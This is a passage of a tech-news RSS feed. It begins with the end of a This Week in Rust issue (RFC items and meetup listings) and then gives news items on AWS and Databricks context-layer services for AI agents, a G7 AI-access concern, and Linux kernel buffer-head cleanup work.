<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156047">Fix trait method resolution on an adjusted never type</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/76314">Tracking Issue for atomic_from_mut</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155499">stabilize never type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153563">Lint against iterator functions that panic when N is zero</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1002">Single-byte counter support in coverage instrumentation</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1003">Rename the compiler files containing struct diagnostics to <code>diagnostics.rs</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#leadership-council"></a><a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>
<ul>
<li><a href="https://github.com/rust-lang/leadership-council/issues/301">Delegate Project Grants to the Funding team</a></li>
<li><a href="https://github.com/rust-lang/leadership-council/issues/304">Allocate budget to the Funding team</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-rfcs"></a><a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3955">Named Fn trait parameters</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2262">Structs with no fields or all-ZST fields are ZSTs</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><em>No New or Updated RFCs were created this week.</em></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-06-17 - 2026-07-15 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-06-17 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314000478/"><strong>Rust Study/Hack/Hang-out</strong></a></li>
</ul>
</li>
<li>2026-06-17 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/ekws5nr4"><strong>Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314236370/"><strong>June, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455931/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-06-21 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329044/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254779/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/313767883/"><strong>Lunch &amp; Learn: What the heck are monads - and how do we fake them in Rust</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210366/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455932/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup/events/">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/315211402/"><strong>Learning Game Development the Hard Way with Rust and Bevy</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris/events/">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345243/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-07-05 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095287/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-07 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315060981/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Virtual (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust/events/">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-06-18 | Aarhus, DK | <a href="https://www.meetup.com/rust-aarhus">Rust Aarhus</a><ul>
<li><a href="https://www.meetup.com/rust-aarhus/events/314965238/"><strong>Talk Night at Danske Commodities</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Edinburgh, GB | <a href="https://www.meetup.com/rust-edi/events/">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/315093492/"><strong>Rust and Friends comes to Glasgow! (daytime coffee)</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Edinburgh, GB | <a href="https://www.meetup.com/rust-edi/events/">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/315093500/"><strong>Rust and Friends comes to Glasgow! (evening pub)</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Barcelona, ES | <a href="https://www.meetup.com/bcnrust/events/">BcnRust</a><ul>
<li><a href="https://www.meetup.com/bcnrust/events/315094938/"><strong>21st BcnRust Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-19 | Dresden, DE | <a href="https://github.com/rust-dresden">Rust Dresden</a><ul>
<li><a href="https://pretix.eu/rust-dresden/on-location-2"><strong>Second Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315040676/"><strong>Rust meetup #86</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Warsaw, PL | <a href="https://luma.com/rust.in.warsaw">Rust Warsaw</a><ul>
<li><a href="https://luma.com/djs7ntfx"><strong>Rust Warsaw Meetup: June 2026</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315200163/"><strong>Rust Manchester June Talks</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/314396600/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Copenhagen, DK | <a href="https://www.meetup.com/copenhagen-rust-community/events/">Copenhagen Rust Community</a><ul>
<li><a href="https://www.meetup.com/copenhagen-rust-community/events/315214426/"><strong>Rust meetup #69</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Edinburgh, GB | <a href="https://www.meetup.com/rust-edi/events/">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314941098/"><strong>Bevy, Bits, &amp; Cats (Rust July Talks)</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Enschede, OV, NL | <a href="https://www.meetup.com/dutch-rust-meetup/events/">Baseflow Tech Meetups</a><ul>
<li><a href="https://www.meetup.com/baseflow-tech-meetups/events/315099547/"><strong>AI Summit</strong></a></li>
</ul>
</li>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin/events/">Rust Dublin</a><ul>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 261</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-06-17 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314000478/"><strong>Rust Study/Hack/Hang-out</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314236370/"><strong>June, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Nashville, TN, US | <a href="https://www.meetup.com/music-city-rust-developers/events/">Music City Rust Developers</a><ul>
<li><a href="https://www.meetup.com/music-city-rust-developers/events/315213927/"><strong>Community Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-20 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225854/"><strong>Northeastern Rust Lunch, June 20</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx/events/">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/315105633/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/314386080/"><strong>Rust LA: Rust-Based Constraint Solvers in 2D Sketching with Zoo Technologies</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539326/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-06-26 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315014582/"><strong>Rust NYC's Big Summer Social</strong></a></li>
</ul>
</li>
<li>2026-06-27 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225857/"><strong>Somerville Union Square Rust Lunch, June 27</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust/events/">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/315103359/"><strong>Git is easy?</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225861/"><strong>Boston University Rust Lunch, July 4</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust/events/">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-06-25 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039461/"><strong>Rust Melbourne June 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-06-18 | Florianópolis, BR | <a href="https://luma.com/rust-sc">Rust SC</a><ul>
<li><a href="https://luma.com/acinctdf"><strong>Rust Floripa</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>"The never type is named after the date of its stabilization" was a good joke while it lasted.</p>
</blockquote>
<p>– <a href="https://www.reddit.com/r/rust/comments/1u1v53c/the_never_type_is_likely_to_stabilize_soon/oqss8ii/">Sergey "Shnatsel" Davidoff on /r/rust</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1780">Dos Moonen</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://this-week-in-rust.org/REDDIT_LINK_HERE">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS enters the context layer race with a graph that learns from agents, not manual curation]]></title>
<description><![CDATA[Building a context layer between enterprise data stores and AI agents is bespoke work, with no standard service to automate or maintain the graphs over time. Amazon is making a direct play to change that.Amazon on Wednesday entered the space, announcing a series of three products it's positioning...]]></description>
<link>https://tsecurity.de/de/3606395/it-nachrichten/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606395/it-nachrichten/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation/</guid>
<pubDate>Thu, 18 Jun 2026 02:17:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Building a context layer between enterprise data stores and AI agents is bespoke work, with no standard service to automate or maintain the graphs over time. Amazon is making a direct play to change that.</p><p>Amazon on Wednesday entered the space, announcing a series of three products it's positioning as a context intelligence stack for AI agents. The centerpiece is AWS Context, a new knowledge graph service that gets smarter through agent usage over time. AWS also announced the general availability of Amazon S3 Annotations and a preview of skill assets in AWS Glue Data Catalog.</p><p>The context layer is now a contested architectural category with no shortage of options from different vendors. AWS is entering that market with a different architectural premise: that the graph should learn from how agents use it automatically, without human re-curation.</p><p>"Your agents now get smarter without you having to rebuild anything from scratch," said Swami Sivasubramanian, vice president of Agentic AI at AWS, during his AWS Summit NYC keynote. </p><p>"This service automatically builds a knowledge graph from all your existing data," he said. "This service infers relationships across your data sets, business rules, and domain knowledge, and makes all of it available to your agents and your organization at runtime."  </p><h2>AWS Context builds a self-learning knowledge graph from existing data</h2><p>It's a problem AWS says it has seen repeatedly in customer deployments. </p><p>AWS Context maps relationships across existing data automatically: what tables exist, what columns mean, how sources relate and which sources are authoritative. It combines semantic search with graph-level reasoning and infers relationships across datasets, business rules and domain knowledge, making all of it available to agents at runtime.</p><p>"The knowledge graph improves itself over time as it learns which sources produce correct results and which parts get used," Sivasubramanian said. </p><p>Data stewards manage the graph through the AWS Management Console, reviewing inferred relationships, promoting them to production and attaching business definitions and usage rules. Every query inherits the calling user's IAM and Lake Formation permissions, making agent data access auditable by identity through controls enterprises already rely on.</p><p>All metadata is published in Apache Iceberg format to Amazon S3 Tables, queryable via Athena, Redshift, Spark or any Iceberg-compatible engine, with no proprietary APIs. Third-party catalog connections are supported, so context from systems outside AWS can be pulled into the same graph. Agents query through agentic search APIs and MCP tools across Bedrock AgentCore, EKS or any MCP-compatible framework.</p><h2>Context is more than just a single service</h2><p>Context is a complicated space and AWS is layering multiple services to help enterprises build context across the data stack.</p><p><b>Amazon S3 Annotations.</b> This service enables users to attach rich business context at the storage layer, directly to individual S3 objects. </p><p><b>AWS Glue Data Catalog skill assets</b>. Glue skill assets attach domain knowledge at the catalog layer, linking runbooks, query patterns and usage rules to data assets across the estate. </p><p>AWS Context then synthesizes both into the knowledge graph that agents query at runtime, combining semantic search with graph-level reasoning across structured and unstructured sources. Each layer feeds the next.</p><h2>AWS is entering a highly competitive context space</h2><p><a href="https://venturebeat.com/data/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem">Snowflake announced</a> its context approach earlier this month with its Horizon Context and Cortex Sense services. Microsoft is providing context via its<a href="https://venturebeat.com/data/enterprise-ai-agents-keep-operating-from-different-versions-of-reality?_gl=1*b66y4g*_up*MQ..*_ga*MTM4OTgwNTA2LjE3ODE3MzAyNTk.*_ga_SCH1J7LNKY*czE3ODE3MzAyNTgkbzEkZzAkdDE3ODE3MzAyNTgkajYwJGwwJGgw*_ga_B8TDS1LEXQ*czE3ODE3MzAyNTgkbzEkZzEkdDE3ODE3MzAyNTgkajYwJGwwJGgw"> Fabric IQ platform</a> that provides a semantic ontology for data. Redis has developed a<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits?_gl=1*i19buu*_up*MQ..*_ga*MTM4OTgwNTA2LjE3ODE3MzAyNTk.*_ga_SCH1J7LNKY*czE3ODE3MzAyNTgkbzEkZzAkdDE3ODE3MzAyNTgkajYwJGwwJGgw*_ga_B8TDS1LEXQ*czE3ODE3MzAyNTgkbzEkZzEkdDE3ODE3MzAyNTgkajYwJGwwJGgw"> context platform</a> that optimizes data for retrieval. Vector database vendor Pinecone has its<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next?_gl=1*klgyi3*_up*MQ..*_ga*MTM4OTgwNTA2LjE3ODE3MzAyNTk.*_ga_SCH1J7LNKY*czE3ODE3MzAyNTgkbzEkZzAkdDE3ODE3MzAyNTgkajYwJGwwJGgw*_ga_B8TDS1LEXQ*czE3ODE3MzAyNTgkbzEkZzEkdDE3ODE3MzAyNTgkajYwJGwwJGgw"> Nexus context offering</a> that compiles enterprise data into task-specific artifacts before agents ever query them.</p><p>AWS's structural argument is straightforward: for enterprises already running S3, Glue and Lake Formation, AWS Context extends an existing identity model with no data movement required. The pitch is zero-integration friction — not just cost consolidation.</p><p>"Context makes agents more powerful and as the whole world is building agents, every agentic platform vendor needs a context capability," Holger Mueller, VP and Principal analyst at Constellation Research, told VentureBeat.</p><p>Mueller noted that AWS is no exception. "The concern — as with all context offerings — is going to be performance, especially for transactional data,  we will see," he said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[World leaders want American AI. They just don’t want America to be able to turn it off.]]></title>
<description><![CDATA[French President Macron and Indian PM Modi raised alarms at the G7 summit that the U.S. could cut off access to American AI overnight  — a fear the Anthropic blackout just made real.]]></description>
<link>https://tsecurity.de/de/3605876/it-nachrichten/world-leaders-want-american-ai-they-just-dont-want-america-to-be-able-to-turn-it-off/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605876/it-nachrichten/world-leaders-want-american-ai-they-just-dont-want-america-to-be-able-to-turn-it-off/</guid>
<pubDate>Wed, 17 Jun 2026 21:02:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[French President Macron and Indian PM Modi raised alarms at the G7 summit that the U.S. could cut off access to American AI overnight  — a fear the Anthropic blackout just made real.]]></content:encoded>
</item>
<item>
<title><![CDATA[Context intelligence for your data and AI agents at scale]]></title>
<description><![CDATA[Agents are only as intelligent as the context they can reason over. Today, that context is scattered across data lakes, data warehouses, lakehouses, databases, and streams, and in institutional knowledge that has never been written down. You want to trust the decisions made by your AI agents, but...]]></description>
<link>https://tsecurity.de/de/3605634/ai-nachrichten/context-intelligence-for-your-data-and-ai-agents-at-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605634/ai-nachrichten/context-intelligence-for-your-data-and-ai-agents-at-scale/</guid>
<pubDate>Wed, 17 Jun 2026 19:18:55 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agents are only as intelligent as the context they can reason over. Today, that context is scattered across data lakes, data warehouses, lakehouses, databases, and streams, and in institutional knowledge that has never been written down. You want to trust the decisions made by your AI agents, but that can't happen until agents have context. Imagine what becomes possible when we give agents a safe way to access the context they need to deliver trusted decisions. This is why at the AWS Summit New York City, we’re announcing a series of innovations that deliver intelligence for your data and AI agents at scale.]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon unveils new AI agents, trying to thread the needle between autonomy and human control]]></title>
<description><![CDATA[AWS used its New York Summit to roll out AI agents that act on their own — from fixing security vulnerabilities to triaging email — while trying to keep humans in control of how far they go. Read More]]></description>
<link>https://tsecurity.de/de/3605267/it-nachrichten/amazon-unveils-new-ai-agents-trying-to-thread-the-needle-between-autonomy-and-human-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605267/it-nachrichten/amazon-unveils-new-ai-agents-trying-to-thread-the-needle-between-autonomy-and-human-control/</guid>
<pubDate>Wed, 17 Jun 2026 17:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1070" height="650" src="https://cdn.geekwire.com/wp-content/uploads/2026/06/aws.png" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/06/aws.png 1070w, https://cdn.geekwire.com/wp-content/uploads/2026/06/aws-768x467.png 768w" sizes="(max-width: 1070px) 100vw, 1070px"><br>AWS used its New York Summit to roll out AI agents that act on their own — from fixing security vulnerabilities to triaging email — while trying to keep humans in control of how far they go. <a href="https://www.geekwire.com/2026/amazon-unveils-new-ai-agents-trying-to-thread-the-needle-between-autonomy-and-human-control/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Some buffer-heads cleanup work]]></title>
<description><![CDATA[Jan Kara has been working
on cleaning up how buffer
heads are used by some kernel filesystems.  In a short
filesystem-track session at the 2026 Linux Storage,
Filesystem, Memory Management, and BPF Summit, he gave an update on
that work and where it is headed.  Topics included generic infrastruct...]]></description>
<link>https://tsecurity.de/de/3605078/linux-tipps/some-buffer-heads-cleanup-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605078/linux-tipps/some-buffer-heads-cleanup-work/</guid>
<pubDate>Wed, 17 Jun 2026 16:09:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jan Kara has been <a href="https://lwn.net/ml/all/20260326082428.31660-1-jack@suse.cz/">working
on cleaning up</a> how <a href="https://www.kernel.org/doc/html/v7.1-rc7/filesystems/buffer.html">buffer
heads</a> are used by some kernel filesystems.  In a short
filesystem-track session at the 2026 <a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux Storage,
Filesystem, Memory Management, and BPF Summit</a>, he gave an update on
that work and where it is headed.  Topics included generic infrastructure
to track buffer heads for metadata, a buffer-head cleanup for the Amiga
filesystem, and some planned locking fixes.]]></content:encoded>
</item>
<item>
<title><![CDATA[DSS 2026: Branche diskutierte Technologien und Strategien]]></title>
<description><![CDATA[Der Digital Signage Summit (The DSS) 2026 hat in München rund 20 Jahre nach seiner Premiere erneut seine Rolle als strategisches Führungsforum der Branche unterstrichen. Im Mittelpunkt standen KI-getriebene Plattformstrategien, Cybersecurity, ...]]></description>
<link>https://tsecurity.de/de/3604769/it-nachrichten/dss-2026-branche-diskutierte-technologien-und-strategien/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604769/it-nachrichten/dss-2026-branche-diskutierte-technologien-und-strategien/</guid>
<pubDate>Wed, 17 Jun 2026 14:32:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Digital Signage Summit (The DSS) 2026 hat in München rund 20 Jahre nach seiner Premiere erneut seine Rolle als strategisches Führungsforum der Branche unterstrichen. Im Mittelpunkt standen KI-getriebene Plattformstrategien, Cybersecurity, ...]]></content:encoded>
</item>
<item>
<title><![CDATA[From RAG to ontology: Databricks bets on context as the key to trusted AI agents]]></title>
<description><![CDATA[First came vector databases, then RAG. Now, the next frontier in enterprise AI is taking shape: context layers that give autonomous agents a shared understanding of the business, a vision Databricks is advancing with Genie Ontology.



Currently in preview, Genie Ontology automatically extracts b...]]></description>
<link>https://tsecurity.de/de/3604524/ai-nachrichten/from-rag-to-ontology-databricks-bets-on-context-as-the-key-to-trusted-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604524/ai-nachrichten/from-rag-to-ontology-databricks-bets-on-context-as-the-key-to-trusted-ai-agents/</guid>
<pubDate>Wed, 17 Jun 2026 13:04:02 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>First came vector databases, then RAG. Now, the next frontier in enterprise AI is taking shape: context layers that give autonomous agents a shared understanding of the business, a vision Databricks is advancing with Genie Ontology.</p>



<p>Currently in preview, Genie Ontology automatically extracts business context from enterprise data, dashboards, queries, pipelines, documents, and applications and organizes it into a living graph that AI agents can use to understand how an organization operates.</p>



<p>Showcased at the company’s Data + AI Summit, Genie Ontology uses a ranking system inspired by <a href="http://infolab.stanford.edu/~backrub/google.html" target="_blank" rel="noreferrer noopener">Google’s PageRank</a> to identify the most authoritative business definitions within an organization.</p>



